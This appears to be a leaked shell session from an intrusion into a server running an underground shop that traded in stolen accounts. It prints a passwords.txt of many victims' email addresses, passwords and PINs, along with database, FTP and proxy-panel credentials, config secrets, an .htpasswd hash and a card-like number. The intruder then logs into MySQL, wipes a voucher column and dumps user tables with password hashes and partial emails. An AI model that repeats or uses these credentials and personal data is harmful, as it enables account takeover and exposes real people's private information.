-rw-r--r--  1 mmgen  www   1616155 Jan 26  2011 FILE0009.rar
-rw-r--r--  1 mmgen  www       952 Jan 26  2011 Fake Webcam (No Preview Mode).lnk
-rw-r--r--  1 mmgen  www       942 Jan 26  2011 Fake Webcam.lnk
-rw-r--r--  1 mmgen  www      1950 Jan 26  2011 FileZilla Client.lnk
-rw-r--r--  1 mmgen  www      1192 Jan 26  2011 Foxit Reader.lnk
-rw-r--r--  1 mmgen  www  10374720 Jan 26  2011 MasterCard-Abrechnung.psd
-rw-r--r--  1 mmgen  www      1889 Jan 26  2011 Mozilla Firefox.lnk
-rw-r--r--  1 mmgen  www     22207 Jan 26  2011 Neues Textdokument.txt
-rw-r--r--  1 mmgen  www       137 Jan 26  2011 PSN2.txt
drwxr-xr-x  2 mmgen  www       512 Jan 26  2011 Pack_Pixel_Arrows_01
drwxr-xr-x  2 mmgen  www       512 Jan 26  2011 Packstation
-rw-r--r--  1 mmgen  www  38207488 Jan 26  2011 PhotoshopCS4Portable.rar
-rw-r--r--  1 mmgen  www      1139 Jan 26  2011 SQLRIP.lnk
-rw-r--r--  1 mmgen  www      1884 Jan 26  2011 SendBlaster.lnk
-rw-r--r--  1 mmgen  www      2505 Jan 26  2011 Skype.lnk
-rw-r--r--  1 mmgen  www    318050 Jan 26  2011 St0re.jpg
-rw-r--r--  1 mmgen  www   4574766 Jan 26  2011 St0re.psd
-rw-r--r--  1 mmgen  www    679964 Jan 26  2011 St0re2.jpg
-rw-r--r--  1 mmgen  www  24560317 Jan 26  2011 St0reinfo - Shopdesign2.psd
-rw-r--r--  1 mmgen  www      1124 Jan 26  2011 TeamViewer 6.lnk
-rw-r--r--  1 mmgen  www       917 Jan 26  2011 WebMoney Keeper Classic 3.9.3.1.lnk
-rw-r--r--  1 mmgen  www     40467 Jan 26  2011 Werbung.png
-rw-r--r--  1 mmgen  www      3821 Jan 26  2011 btn2.png
-rw-r--r--  1 mmgen  www     68286 Jan 26  2011 btn2.psd
-rw-r--r--  1 mmgen  www    748437 Jan 26  2011 exported data.txt
-rw-r--r--  1 mmgen  www      1179 Jan 26  2011 head.gif
-rw-r--r--  1 mmgen  www   1789314 Jan 26  2011 head.psd
-rw-r--r--  1 mmgen  www   2084608 Jan 26  2011 hinten.png
-rw-r--r--  1 mmgen  www       791 Jan 26  2011 new  2.txt
-rw-r--r--  1 mmgen  www      1133 Jan 26  2011 new  5.txt
-rw-r--r--  1 mmgen  www       528 Jan 26  2011 new  9.txt
-rw-r--r--  1 mmgen  www      3318 Jan 26  2011 passwords.txt
-rw-r--r--  1 mmgen  www    145044 Jan 26  2011 pp.rar
-rw-r--r--  1 mmgen  www  31694808 Jan 26  2011 setup.exe
-rw-r--r--  1 mmgen  www    353781 Jan 26  2011 store.rar
-rw-r--r--  1 mmgen  www     74196 Jan 26  2011 title.gif
-rw-r--r--  1 mmgen  www     76765 Jan 26  2011 title_unreg.gif
-rw-r--r--  1 mmgen  www   2286399 Jan 26  2011 vorne.png
-rw-r--r--  1 mmgen  www      1087 Jan 26  2011 wrub4sts.lnk
# 

# cat passwords.txt
j_username=sny@vtxmail.ch
j_password=tino55
pin=tino55

j_username=office@vertec-systems.com
j_password=121066
pin=




j_username=DeineMutter@fickich.net
j_password=Diehuredie
pin=1234dudummestier

j_username=HeyduFotze@magdich.net
j_password=ArschPo
pin=verarschmichnicht

j_username=mybigmouth@web.de
j_password=andrea
pin=1950

j_username=
j_password=
pin=

j_username=Rainer.Keberle@online.de
j_password=finepix4700
pin=

j_username=1746378
j_password=
pin=q206mitte



j_username=1746378
j_password=
pin=q206mitte

j_username=2187452
j_password=
pin=q206mitte

j_username=rababa@whitehouse.gov
j_password=dollar
pin=4711




j_username=170734837
j_password=express12
pin=

j_username=office@otto-stoeckl.com
j_password=
pin=

j_username=170734837
j_password=express
pin=12

j_username=nicole.dargel@gmx.de
j_password=Diving66
pin=

j_username=claudia.schultz@shell.com
j_password=chris1
pin=4449

j_username=claudia.schultz@shell.com
j_password=chris1
pin=4449

j_username=claudia.schultz@shell.com
j_password=chris1
pin=

j_username=734093
j_password=19birgit
pin=7578

j_username=734093
j_password=19nadine
pin=7578

j_username=734093
j_password=birgit
pin=7578



j_username=sabina.mastrogiovanni@gmx.de
j_password=2dU8yU9qY4aC
pin=5942

j_username=sabina.mastrogiovanni@gmx.de
j_password=2dU8yU9qY4aC
pin=5942

j_username=Heldmann_C@web.de
j_password=
pin=6237

j_username=Heldmann_C@web.de
j_password=
pin=6237

j_username=benjamin.egermann@gmail.com
j_password=pcarmy
pin=6039

j_username=sabina.mastrogiovanni@gmx.de
j_password=2dU8yU9qY4aC
pin=5942

j_username=
j_password=
pin=

j_username=danisahne8283@aol.com
j_password=
pin=masenfan


j_username=danisahne8282@aol.com
j_password=masenfan
pin=5556

j_username=danisahne8283@aol.com
j_password=
pin=

j_username=danisahne8283@aol.com
j_password=masenfan
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=

j_username=
j_password=
pin=


j_username=hannesvw@gmail.com
j_password=
pin=9016




j_username=Thomas.Wunder@hv-s.de
j_password=Mannheim
pin=


j_username=mail@obu-hamburg.de
j_password=obu2009
pin=

j_username=mail@obu-hamburg.de
j_password=2493
pin=

j_username=mail@obu-hamburg.de
j_password=OBU2009
pin=

j_username=31971258
j_password=
pin=2493





j_username=mario.hoefler@web.de
j_password=nutpen10
pin=

j_username=E.Giegler@web.de
j_password=Eschen
pin=5115

j_username=E.Giegler@web.de
j_password=Eschen
pin=5115


j_username=mail@obu-hamburg.de
j_password=obu2009
pin=2394

# cat Data.txt
MySQL
https://91.213.8.13/myadmin/
$host = localhost
$user = Palshop
$pass = u5AunWox
$data = morgen_Palshop

FTP:
91.213.8.26
morgen
2Rysb2Kv

5socks
http://admin.5socks.net/
Morgen
Kzmv7QkvIf


0458-8466-1325-4447	UVszBT <<<< 50?# 

# cd ..

# cd ..

# cd st0re.morgen.w2c.ru

# ls -la
total 16
drwxrwx---  4 mmgen  www  512 Dec  2  2010 .
drwxr-x---  7 mmgen  www  512 Jun 11 13:18 ..
drwxr-xr-x  5 mmgen  www  512 Dec  2  2010 admin
drwxr-xr-x  8 mmgen  www  512 Dec  3  2010 content

# cd admin

# ls -la
total 56
drwxr-xr-x  5 mmgen  www   512 Dec  2  2010 .
drwxrwx---  4 mmgen  www   512 Dec  2  2010 ..
-rw-r--r--  1 mmgen  www  8621 Dec  2  2010 DE.lng
-rw-r--r--  1 mmgen  www  1546 Dec  2  2010 admin.php
-rw-r--r--  1 mmgen  www   708 Dec  3  2010 config.php
drwxr-xr-x  3 mmgen  www   512 Dec  2  2010 designe
-rw-r--r--  1 mmgen  www  1008 Dec  2  2010 functions.php
drwxr-xr-x  4 mmgen  www   512 Dec  2  2010 img
-rw-r--r--  1 mmgen  www   876 Dec  3  2010 index.php
drwxr-xr-x  2 mmgen  www   512 Dec  2  2010 pages

# cat config.php
<?php
/***************
/   PalShop    /
/  By Paloxus  /
/    v 1.5     /
***************/

session_start();
error_reporting(0);
$host = 'localhost'; //mysql host
$user = 'mmgen_shop'; //db user
$pass = '1y2x3c4v'; //db pass
$data = 'mmgen_shop'; //db name
$connect = mysql_connect($host, $user, $pass);
mysql_select_db($data, $connect);

$ajax = '0'; //use ajax [ 0 = no, 1 = yes ]
$guthaben = '€'; // [ $, ? = £, ? = ¥, ? = € ]
$designe = 'design'; // blue oder dark
$session_prefix = '1y2x3c4v'; // DRINGEND ?NDERN! Beispielsweise in eine Buchstaben-Zahlen Kombination
$language = 'DE'; //Sprache des CMS

//Produkt Bilder:
$prod_img = 1; // Produktbilder verwenden 1 = Ja, 2 = Nein
?>

# cd /home/mmgen/st0re.cc

# ls -la
total 1522696
drwxrwx---  8 mmgen  www       1024 Sep 30 16:19 .
drwxr-x---  7 mmgen  www        512 Jun 11 13:18 ..
-rw-r--r--  1 mmgen  www   16950051 Sep 13 01:08 1.mp3
-rw-r--r--  1 mmgen  www     941752 Sep 30 16:19 2.rar
-rw-r--r--  1 mmgen  www     144694 Jan 30  2011 3.jpeg
-rw-r--r--  1 mmgen  www  760708777 Sep 13 00:58 4.rar
-rw-r--r--  1 mmgen  www      30654 Feb 22  2011 Banner.jpg
-rw-r--r--  1 mmgen  www      40505 Feb  7  2011 Banner4.jpg
-rw-r--r--  1 mmgen  www      13347 Feb  3  2011 Jelly.jpg
-rw-r--r--  1 mmgen  www      53943 Feb  3  2011 Kamagra.png
drwxr-xr-x  3 mmgen  www        512 Feb 21  2011 Neu
drwxr-xr-x  3 mmgen  www        512 Jun  2 18:52 Ref
-rw-r--r--  1 mmgen  www       8967 Jul 17 16:04 Ukash.php
-rw-r--r--  1 mmgen  www       4756 Jan 27  2011 account.php
-rw-r--r--  1 mmgen  www       1532 Jan 27  2011 account_do.php
-rw-r--r--  1 mmgen  www        978 Jan 27  2011 add_basket.php
drwxr-xr-x  7 mmgen  www        512 Mar 10  2011 admin
-rw-r--r--  1 mmgen  www     164100 Apr 10 16:10 banner.gif
-rw-r--r--  1 mmgen  www       2398 Jan 28  2011 basket.php
-rw-r--r--  1 mmgen  www      11921 Jul 21 23:44 cashin.php
-rw-r--r--  1 mmgen  www       2278 Apr  9 18:00 category.php
-rw-r--r--  1 mmgen  www       5223 Mar 10  2011 cc_modul.php
-rw-r--r--  1 mmgen  www       2265 Feb  8  2011 checkout.php
-rw-r--r--  1 mmgen  www       1471 Jan 27  2011 error.php
-rw-r--r--  1 mmgen  www       1007 Jan 27  2011 faq.php
-rw-r--r--  1 mmgen  www       1406 Apr 18 12:49 favicon.ico
-rw-r--r--  1 mmgen  www      17594 Jan 27  2011 head.png
drwxr-xr-x  2 mmgen  www        512 Aug 21 22:23 ico
-rw-r--r--  1 mmgen  www       7623 Jun  2 19:58 index.php
drwxr-xr-x  2 mmgen  www        512 Apr  8 17:22 libs
-rw-r--r--  1 mmgen  www        886 Jan 27  2011 login.php
-rw-r--r--  1 mmgen  www       1177 Jan 27  2011 login_do.php
-rw-r--r--  1 mmgen  www        164 Jan 27  2011 logout.php
-rw-r--r--  1 mmgen  www       1879 Jan 27  2011 product.php
-rw-r--r--  1 mmgen  www       1319 Jan 27  2011 register.php
-rw-r--r--  1 mmgen  www       1827 Jan 27  2011 register_do.php
drwxr-xr-x  3 mmgen  www        512 May 17 03:21 style
-rw-r--r--  1 mmgen  www       8011 Apr 13 21:31 support.php
-rw-r--r--  1 mmgen  www       2417 Apr 13 21:31 support_do.php

# cd admin

# ls -la
total 268
drwxr-xr-x  7 mmgen  www    512 Mar 10  2011 .
drwxrwx---  8 mmgen  www   1024 Sep 30 16:19 ..
-rw-r--r--  1 mmgen  www    106 May 17 13:31 .htaccess
-rw-r--r--  1 mmgen  www     40 Jun  2 18:50 .htpasswd
-rw-r--r--  1 mmgen  www   8372 Feb  8  2011 category.php
drwxr-xr-x  2 mmgen  www    512 Feb  8  2011 css
-rw-r--r--  1 mmgen  www   4599 Jan 27  2011 faq.php
drwxr-xr-x  6 mmgen  www    512 Feb  8  2011 images
-rw-r--r--  1 mmgen  www  14618 Mar 10  2011 index.php
-rw-r--r--  1 mmgen  www   8549 Feb 13  2011 items.php
drwxr-xr-x  7 mmgen  www    512 Feb  8  2011 js
drwxr-xr-x  3 mmgen  www    512 Jan 27  2011 libs
-rw-r--r--  1 mmgen  www   7359 Mar 10  2011 modul.php
-rw-r--r--  1 mmgen  www   9007 Feb  8  2011 news.php
-rw-r--r--  1 mmgen  www   1256 Jan 27  2011 option.php
-rw-r--r--  1 mmgen  www  11703 Feb  8  2011 product.php
drwxr-xr-x  3 mmgen  www    512 Jan 27  2011 style
-rw-r--r--  1 mmgen  www     18 Jan 29  2011 test.php
-rw-r--r--  1 mmgen  www  10040 Apr  9 19:18 tickets.php
-rw-r--r--  1 mmgen  www  12164 Feb  8  2011 user.php
-rw-r--r--  1 mmgen  www  17532 Feb  8  2011 voucher.php

# cat .htaccess
AuthType Basic
AuthName "FUCK YOU"
AuthUserFile /home/mmgen/st0re.cc/admin/.htpasswd
Require valid-user
     
# cat .htpasswd
Admin:$1$5KnX9ENu$aKqzHTLd5HpMqKqgnglUx/

# cd ..

# cd libs

# ls -la
total 56
drwxr-xr-x  2 mmgen  www   512 Apr  8 17:22 .
drwxrwx---  8 mmgen  www  1024 Sep 30 16:19 ..
-rw-r--r--  1 mmgen  www  2757 Jan 27  2011 class_bbcode.php
-rw-r--r--  1 mmgen  www  1561 Jan 28  2011 class_user.php
-rw-r--r--  1 mmgen  www   227 Jun  2 18:20 mysql_config.php
-rw-r--r--  1 mmgen  www  1312 Apr 11 00:18 psc_cashin.class.php
-rw-r--r--  1 mmgen  www  4383 Jul 19 21:35 ukash_cashin.class.php
-rw-r--r--  1 mmgen  www  7679 Apr  8 17:21 xxx_psc_cashin.class.php
# cat mysql_config.php
<?php
#####################
#     LudenCMS v1   #
#  mysql_config.php #
#####################

$mysql_host     = "localhost";
$mysql_username = "mmgen_shop";
$mysql_password = "og.39//(kl";
$mysql_database = "mmgen_shop";

?>

So let's check out their SHOP DB

# mysql -u mmgen_shop -D mmgen_shop -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 89332
Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| mmgen_shop         | 
| test               | 
+--------------------+
3 rows in set (0.00 sec)

mysql> SHOW TABLES;
+----------------------+
| Tables_in_mmgen_shop |
+----------------------+
| shop_basket          | 
| shop_ccmodul         | 
| shop_coupon          | 
| shop_faq             | 
| shop_items           | 
| shop_navigation      | 
| shop_news            | 
| shop_options         | 
| shop_orders          | 
| shop_products        | 
| shop_tickets         | 
| shop_user            | 
| shop_voucher         | 
+----------------------+
13 rows in set (0.00 sec)

mysql> # LOLOLO let's rm password info
mysql> UPDATE shop_voucher SET infos = ""; 
Query OK, 11 rows affected (0.00 sec)
Rows matched: 11  Changed: 11  Warnings: 0

mysql> SELECT * FROM shop_voucher;
+-------+--------+------+---------------------+-------+-------+------------+
| payid | userid | type | code                | infos | value | date       |
+-------+--------+------+---------------------+-------+-------+------------+
|  1872 |  10522 |    1 | 0905-1066-3280-8205 |       |    10 | 2011-09-30 | 
|  1873 |  10522 |    1 | 0747-8763-8777-7583 |       |    10 | 2011-09-30 | 
|  1874 |  10482 |    1 | 0170-8844-2643-6121 |       |    10 | 2011-09-30 | 
|  1875 |  10161 |    1 | 0662-3887-5897-6736 |       |    21 | 2011-09-30 | 
|  1877 |   8885 |    1 | 0795-2181-5472-4078 |       |    10 | 2011-09-30 | 
|  1878 |  10575 |    1 | 0508-5218-3536-7066 |       |    10 | 2011-09-30 | 
|  1869 |  10568 |    1 | 0725-8889-7048-6149 |       |    10 | 2011-09-30 | 
|  1870 |  10300 |    1 | 0677-5871-1938-8696 |       |    10 | 2011-09-30 | 
|  1871 |  10557 |    1 | 0570-2670-2925-4453 |       |   100 | 2011-09-30 | 
|  1402 |   5356 |    0 |                     |       |     0 | 2011-07-21 | 
|  1403 |   9652 |    0 |                     |       |     0 | 2011-07-21 | 
+-------+--------+------+---------------------+-------+-------+------------+
11 rows in set (0.00 sec)

mysql> # Now how about we check who actually buys shit
mysql> SELECT * FROM shop_user WHERE credits > 5;
+--------+---------------+----------------------------------+--------------+---------+--------+---+
| userid | username      | password                         | icq          | credits | status | x |
+--------+---------------+----------------------------------+--------------+---------+--------+---+
|      6 | J0hn.X3r      | dbd570d9cfb7ee0473a7890e641a1f45 | 898437       |      20 |      0 | 0 | 
|    189 | Arma          | 93f5d2a618cde4160d3eb8f748221f91 | arma@hush.ai |      10 |      0 | 0 | 
|    208 | iron.t        | 9b630edecc947a5f9e5d4ca59462663f | iron.t@hotbo |      15 |      0 | 0 | 
|    514 | ngized        | 3dcbb61d6599e4cbe89510c28f324f66 | camora18@web |      10 |      0 | 0 | 
|    571 | basha         | 1618a9fe1c58f2bedd2fdccefaa6da21 | basha444@web |       9 |      0 | 0 | 
|    625 | stefgexp      | 55132608a2fb68816bcd3d1caeafc933 | c.k.007@web. |      40 |      0 | 0 | 
|    794 | Tanoths       | b5042eac66b4bdb8c6e42560f964ed3c | max@lilium-n |      23 |      0 | 0 | 
|    804 | TB4ever       | 4be5ce67d73fb9b6dda4d91d45387d16 | jjstyler@liv |       7 |      0 | 0 | 
|    945 | Sven          | 3dd19f98fd4adb12e6cee669341381aa | vb-sveiven@w |      10 |      0 | 0 | 
|    973 | binglly       | 1a7384005bd77b151e11d58ac79da095 | binglly@web. |      10 |      0 | 0 | 
|   1120 | etrax         | 4f0cb9262f0a0fdab6c9db4c122024c2 | etrax@secure |      10 |      0 | 0 | 
|   1174 | JUMPhil       | 40d914022aca12c372304e1cf2e89b88 | 836499       |       9 |      0 | 0 | 
|   1195 | m0rpheus      | 06aa90cb7e31b1de837cdfd4b837163c | m0rpheusz@o2 |      10 |      0 | 0 | 
|   1207 | HansMeier     | 44354626326b1cd44cce845e8393ac0d | hansmeierfor |       6 |      0 | 0 | 
|   1353 | dr.mouse      | b5ba41ed05b0b197546e2a4283af77ae | gucci23@hush |       7 |      0 | 0 | 
|   1691 | play          | 0c2192030b08d26b06b073eef083548a | b4252353@ugg |      17 |      0 | 0 | 
|   1771 | fros          | e0e93346794bf614a1f02254d9d8b21e | ritho.ritho@ |      10 |      0 | 0 | 
|   1810 | melvyn10      | 41df744f22aa3d7f81983a77e2899829 | melvyn10@081 |      15 |      0 | 0 | 
|   1941 | phyntox       | 33d42d1eb34ec443704571b0ce34193e | phyntox@goog |      10 |      0 | 0 | 
|   1967 | fatal         | 592b36d730c592cce0eebe1731d143ec | fatal3x@live |       7 |      0 | 0 | 
|   2010 | Dodo          | d6d963cedb8dbc1ee57f271e942fbadd | bennibluemch |       7 |      0 | 0 | 
|   2301 | Blizzardo     | 15b29ffdce66e10527a65bc6d71ad94d | blizzardfert |      10 |      0 | 0 | 
|   2415 | ecstasy       | 887e1733037e9af10502b8bf923ad202 | Riehm93@onli |       6 |      0 | 0 | 
|   2478 | basics        | cf7303a964a1682deeb3db90fbe3aeab | admin@mail-s |       6 |      0 | 0 | 
|   2630 | Stehlampe     | db1527f7ecd3dd38f5de94e38cae2c53 | waswillstdud |      20 |      0 | 0 | 
|   2641 | mettwurst     | 245a93ee61572bdda20c145374192603 | mettwurst@sa |       8 |      0 | 0 | 
|   2677 | Syntax        | 068d03ef735f14d75cd78d0ad5e427a3 | psych0tik@li |      13 |      0 |   | 
|   2696 | seife123      | a2327b1893edf0719cc1f29b8d807957 | azzzze@yahoo |      10 |      0 | 0 | 
|   2703 | fam0us        | 8f036369a5cd26454949e594fb9e0a2d | ifam0us@hotm |      20 |      0 | 0 | 
|   2731 | Borni81       | 8d8e4a0f1607ecb8790bce4d03331749 | bornito@live |       6 |      0 | 0 | 
|   2763 | termi         | 573bd983f1a92bb6cf8b535919e3a728 | Hans.olaf1@w |       6 |      0 | 0 | 
|   2827 | O.M.A.        | 6b8d556a2c4e1a17c57c4019d58377f7 | Mueller_Simo |       7 |      0 | 0 | 
|   2861 | Epicfisch     | 5785adb4d56e4dd0e2732c26ccc3a0ca | admin@stream |      10 |      0 | 0 | 
|   2960 | daunilein     | 0e1ffc254643ad1b3a006a347146282f | downi@downi. |       6 |      0 | 0 | 
|   3101 | Pr3dator      | 65a5a3d88782ceb6af221234670ec8fb | christian.ri |      13 |      0 | 0 | 
|   3135 | hassan3       | 8ce4ffbdd4b371c255be75734f26cd72 | guzter@ahoo. |      10 |      0 | 0 | 
|   3208 | maddox        | 4a3ef4824d67af46ea57a39b72dea7df | a3351613@owl |       8 |      0 | 0 | 
|   3256 | k00ky         | 649f7f3295eb1163604ce906b6a6c498 | k00ky@hotmai |       9 |      0 | 0 | 
|   3266 | 1337man       | f29f5f0849fec2e6bc1c10de788410fa | roflfastlola |      11 |      0 | 0 | 
|   3321 | djinns        | c316236440037c0a621d592222708b72 | djinnsrs@goo |       8 |      0 | 0 | 
|   3433 | fluxay        | 64d1f88b9b276aece4b0edcc25b7a434 | dir@mailinat |      70 |      0 | 0 | 
|   3628 | BOMBER        | 8e26756ab1075b72dd82965c3d67c162 | bersch5555@w |       6 |      0 | 0 | 
|   3731 | testuser0     | 68b62823ed173ad3bed0ce700d556b2a | b999347@owlp |      25 |      0 | 0 | 
|   3829 | Skywalker     | 077efa5fc07874cb04bd359845314743 | b1459562@owl |      10 |      0 | 0 | 
|   3905 | Plasmasmog    | ba9912907e468a911de722cd811b99b2 | Plasmasmog@m |      10 |      0 | 0 | 
|   3951 | master1234    | bffdd53cd1557a14c84b6f42f2012187 | forfreemovie |      10 |      0 | 0 | 
|   4038 | !XSS          | 5b84d7e9450f523d263a1e2844d333da | xss-xss@Safe |      17 |      0 | 0 | 
|   4114 | sh0x          | 7e573aedbe6d321228de54fcacee7ebd | leandroking@ |       6 |      0 | 0 | 
|   4121 | slice         | c53c7a272390264c5e6beddcc410daa5 | esel@yahoo.d |      10 |      0 | 0 | 
|   4140 | Dennske       | f8eb6ce796e56b0260d9e77c6e057a20 | wccrew@web.d |      10 |      0 | 0 | 
|   4144 | -Bounter-     | 2fec358d161f20e1d51e24641d76312f | dreamy@warez |      10 |      0 | 0 | 
|   4470 | Phantonym     | 95abaa72bd229ec8f058519bb4bcfe87 | Phantonym@hu |      11 |      0 | 0 | 
|   4474 | CyberTT       | df53ca268240ca76670c8566ee54568a | a1679852@bof |       6 |      0 | 0 | 
|   4476 | Getter        | 530ea1472e71035353d32d341ecf6343 | a1682682@bof |      50 |      0 | 0 | 
|   4808 | ceres2        | dd4df322be3679fc422ab3d45fc97e96 | ceres@imails |      13 |      0 | 0 | 
|   4846 | check         | 3756dd32ed2706bb3b6fc004b0e4ef80 | senmobiles@h |       8 |      0 | 0 | 
|   4890 | lgdavid       | 5daec48bdfda7423e079b99c80c13ed1 | david.wang20 |       7 |      0 | 0 | 
|   4919 | stronger87    | ea110dfdeb4b966c81f7d786df7b1192 | dirkbischof@ |      10 |      0 | 0 | 
|   4944 | burberry      | 55f9c405bd87ba23896f34011ffce8da | burberry1337 |       6 |      0 | 0 | 
|   5088 | L4x1337       | 7518f76db987755dbb01c52e177ba134 | 591238155    |       8 |      0 | 0 | 
|   5126 | Neon          | ab64f71b84891bc31fe85512d35716a8 | neon19881@we |      10 |      0 | 0 | 
|   5401 | schlecker     | cf14f069b4e041d13f50361dd54b9a33 | sjsj@web.de  |       8 |      0 | 0 | 
|   5446 | sexy1337      | e10adc3949ba59abbe56e057f20f883e | sadsadasdmer |       9 |      0 | 0 | 
|   5642 | firelabs      | 076c91ca1a80a49970a3e094ef5954cf | fuckthatbitc |      10 |      0 | 0 | 
|   5727 | 2t-power      | 0df174153bd462f50c728006d9d1c704 | eiermann@hus |       6 |      0 | 0 | 
|   6079 | pete          | 620209aea87f7bae2bd2445d094ba275 | karl-otto3@w |      20 |      0 | 0 | 
|   6092 | accored       | bc47508edab07c1a0082c714fdc08eab | acc0r3d@yaho |      18 |      0 | 0 | 
|   6167 | mercury       | 98169b656c826331d6e9d5e334ca7be8 | fakemail@bla |      10 |      0 | 0 | 
|   6183 | Roxas         | d412a68fd7624bfe220f55f53c26f5a7 | Roxas_1991@g |      20 |      0 | 0 | 
|   6187 | Redbullfly    | 3a82ca9ca9bfe5db9d9eda406c13ac61 | Redbullfly@g |       8 |      0 | 0 | 
|   6263 | Madd1n        | e2a2a6d692a27773a9da52f7e82cfde7 | martinkieser |       6 |      0 | 0 | 
|   6465 | terror        | 9a1b0d5d2d14b7272183d51fe5914f25 | b1245111@lhs |      12 |      0 | 0 | 
|   6549 | drupp         | e19d5cd5af0378da05f63f891c7467af | drupp88@goog |      53 |      0 | 0 | 
|   6590 | _wayne        | dc8996397be86e49cb56fd6face00c7f | mkoch@live.d |       6 |      0 | 0 | 
|   6667 | krillewurm    | 06e0274429fc435c0335237c0006f13c | easy-riderz@ |      25 |      0 | 0 | 
|   6689 | sundy         | 263f55f9f491876ebe21af13c2ee4589 | ra.klaus.sta |       7 |      0 | 0 | 
|   6772 | 1311          | 2aed094745c811516aea636e52015bc8 | 2010@9y.com  |      10 |      0 | 0 | 
|   6820 | drbob         | edfff284ca91b5676d8caa85f0cfd1df | BlackDesire2 |      20 |      0 | 0 | 
|   6885 | Lankabel      | 4297f44b13955235245b2497399d7a93 | 123@123.123  |      35 |      0 |   | 
|   6953 | fr34c10       | 200820e3227815ed1756a6b531e7e0d2 | festner@mail |      10 |      0 |   | 
|   7040 | Cysis         | 984c8c7b5d1d358c1470b1a2f81cdd3b | 4216SD@gmail |      40 |      0 |   | 
|   7042 | Fire          | e94e346e5bb49449d6d607939ddbf63c | cyler@hotmai |       8 |      0 |   | 
|   7072 | drbob100      | 8faddb27516de448b4f7a434b5a7130a | Blackddeess@ |      20 |      0 |   | 
|   7105 | runner91      | 8a7d489dbea2c6d8ad710b47ea68bc05 | malli-2006@w |     7.5 |      0 |   | 
|   7190 | jacov         | f30d05ead11bea743d583e4282e304f6 | n0b0dy.fh@we |       7 |      0 |   | 
|   7193 | kratos1       | 59779937922f0264885e4f871257be48 | fgikto@googl |       7 |      0 |   | 
|   7227 | s30s          | 5103c1995af9f7fc6751de332bcfdfd3 | xc0ree@cust. |       7 |      0 |   | 
|   7603 | fws           | 73cb82e5496bfc9e4a6bc70ea2826e56 | ao@f-ws.de   |      32 |      0 |   | 
|   7803 | CodeRed       | e89b7c5cc238c5871ceeafe46d3d3154 | CodeRed94@ho |       6 |      0 |   | 
|   7827 | liviu         | 65399351c23e646ae6ad68c938015c14 | zut@wet.de   |       6 |      0 |   | 
|   7887 | Anything      | 9f4633f632153c74bcddcbf9c1d2fbed | 113377       |       9 |      0 |   | 
|   7899 | piren20       | cc03e747a6afbbcbf8be7668acfebee5 | mh.zeh@web.d |      10 |      0 |   | 
|   7925 | sdffsf        | c02711d20a521eb8d1e5aeefb6bbecab | dfds@sd.de   |       7 |      0 |   | 
|   8114 | sTiNN         | 745c0ccdb25262e3a17afe9fd6456a5c | stinn@live.d |       6 |      0 |   | 
|   8122 | bigdady       | 9933fb405b690fb59015b8981e09e671 | 621178350    |      10 |      0 |   | 
|   8249 | freestyl      | 2968da776da97fdd7d4910189411804e | as7da9d@gmx. |      20 |      0 |   | 
|   8324 | kamel         | e73e1bd2feb22b75c0ec0cacfd0b9d25 | 81023871     |      13 |      0 |   | 
|   8340 | iphonejumper  | 5db9e40fd1ae010e435884cedbfde349 |              |       7 |      0 |   | 
|   8408 | joe321        | f36e8a3b77970d55a984672972555c40 |              |      35 |      0 |   | 
|   8414 | Crackfox      | 10b43971a8295f3720f38fbcdd9d6ac6 |              |       6 |      0 |   | 
|   8470 | shoxx12       | 1e45690858e3dfdeebbd67eb5db2653b |              |     5.5 |      0 |   | 
|   8493 | alexander     | dd22141acb5ea065acd5ed773729c98f | 000000       |      30 |      0 |   | 
|   8554 | hurens0hn     | 08ba21f5a9f192e3114ce9c3d29c0f8f | 383051368    |      25 |      0 |   | 
|   8580 | Bester12      | 8e2a99e1e5e356f5b9b874c8d9d83c79 | 456          |      40 |      0 |   | 
|   8627 | Kleedyyy      | 8d0c8f9d1a9539021fda006427b993b9 |              |       7 |      0 |   | 
|   8645 | Energie       | ea110dfdeb4b966c81f7d786df7b1192 |              |       7 |      0 |   | 
|   8691 | JimPanse      | f56a8901702b2c279c065f2ca15890ec |              |       8 |      0 |   | 
|   8744 | cubee         | 4a3ef4824d67af46ea57a39b72dea7df |              |       7 |      0 |   | 
|   8762 | Dodel         | 5657c76ad9a05ea0d9899f94dc4121e9 |              |       8 |      0 |   | 
|   8826 | kuni77        | 22f3555c832cde0134c65e9cb44424ee | 615664295    |       7 |      0 |   | 
|   8866 | sysfuck       | 95a3d9c2bce545f46bc54d8a750438b1 |              |    17.5 |      0 |   | 
|   8879 | payment       | ed8539ed5fe17d4dc3a18058831fb9bd |              |      10 |      0 |   | 
|   8890 | PolskaDumny   | c288a40b22e236022e43f96cf7bab952 | 165-034      |     8.5 |      0 |   | 
|   8933 | Dubstep       | 3116ccacabe066ce091b171347fca80d | 427-073-373  |    25.2 |      0 |   | 
|   8960 | Hotter        | 0981ee032a8e8af483dc24390916c737 | 282979840    |     7.5 |      0 |   | 
|   8969 | network44     | 44252cf93dd7a73ecc031f8363a26459 | 618445       |      10 |      0 |   | 
|   9010 | sey           | f2f6ca16e070070fc5465ab4209586b5 |              |      10 |      0 |   | 
|   9094 | MrPataa       | 9c7b04e137048c6dc5bc2dae0f78bf68 |              |      10 |      0 |   | 
|   9122 | Semtex99      | 9ca40c627bb00f08347cf336fb09011b |              |       9 |      0 |   | 
|   9183 | trainee       | a2147086850706ecb2b6f2919fed8e40 | 350610       |       7 |      0 |   | 
